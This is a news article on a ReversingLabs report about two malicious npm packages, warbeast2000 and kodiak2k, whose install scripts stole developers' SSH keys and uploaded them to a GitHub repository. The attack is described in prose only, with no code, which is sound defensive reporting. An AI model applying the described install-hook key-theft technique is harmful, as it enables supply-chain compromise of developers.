Security researchers discovered two new malicious packages on the open source package manager npm that used GitHub to store stolen Base64-encrypted SSH keys from developers’ systems.
These packages, identified earlier this month, have since been removed from npm. According to a ReversingLabs report released today, this discovery highlights an ongoing trend of cybercriminals exploiting open source package managers for malware supply chain campaigns.
More generally, the company suggested a 1,300% increase in malware packages found on open source package managers between 2020 and the end of 2023. These malware packages range from low-threat protest software to more sophisticated campaigns delivering malware directly from open source packages.
The first package, named warbeast2000, is still under development, but exhibited malicious behavior in its latest version. During installation, it launched a post-installation script that retrieved and executed a JavaScript file. This script reads the private SSH key from the id_rsa file in the /.ssh directory, uploading the Base64-encoded key to an attacker-controlled GitHub repository.
The second package, kodiak2k, had a operating modewith additional features in its versions including calling the Mimikatz hacking tool and running various scripts.
ReversingLabs warned that an alarming aspect of these attacks is their targeting of SSH keys, providing unauthorized access to GitHub repositories and potentially compromising proprietary code.
Fortunately, the impact of this campaign was limited, with warbeast2000 downloaded around 400 times and kodiak2k around 950 times.
However, ReversingLabs expressed concern about malicious actors’ increasing reliance on open source software and development frameworks, such as GitHub, to host malicious command and control (C2) infrastructure components.
“With more and more open source malware available, GitHub is increasingly being used by malicious actors to support their campaigns. Often, these open source malware packages are feature-rich and come with very detailed documentation allowing even low-skilled hackers (“script kiddies”) to deploy them,” the advisory reads.
“As malicious actors continue to develop new techniques for writing malware, developers as well as security researchers must be wary of new threats lurking in public repositories.”
To face these threats, the company recommended That developers perform a security assessment before incorporating software or a library from package managers like npm or PyPI.
Image credit: Primakov / Shutterstock.com